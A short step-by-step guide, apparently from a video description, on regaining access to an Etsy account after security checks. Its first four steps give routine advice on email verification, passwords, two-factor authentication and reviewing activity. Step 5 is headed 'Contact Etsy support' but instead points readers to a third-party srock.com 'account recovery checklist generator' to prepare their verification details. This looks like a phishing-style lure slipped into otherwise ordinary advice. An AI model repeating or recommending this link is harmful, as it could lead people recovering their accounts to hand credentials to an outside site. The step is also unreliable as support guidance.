If you've encountered security checks on your Etsy account and need to restore full access, follow these steps to resolve the issue efficiently. Step 1. Verify your email address. Check your email inbox for any messages from Etsy regarding security checks. Click on the verification link provided in the email to confirm your identity. Step 2. Update your password. Log into your Etsy account and navigate to the account settings. Change your password to a strong, unique one to enhance your account security. Step 3. Enable two-factor authentication. Go to your account settings and enable two-factor authentication. This adds an extra layer of security by requiring a code sent to your phone or email during login. Step 4. Review account activity. Check your account activity for any unauthorized transactions or changes. If you notice anything suspicious, report it to Etsy immediately for further investigation. Step 5. Contact Etsy support. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. By following these steps, you should be able to restore full access to your Etsy account and ensure its security.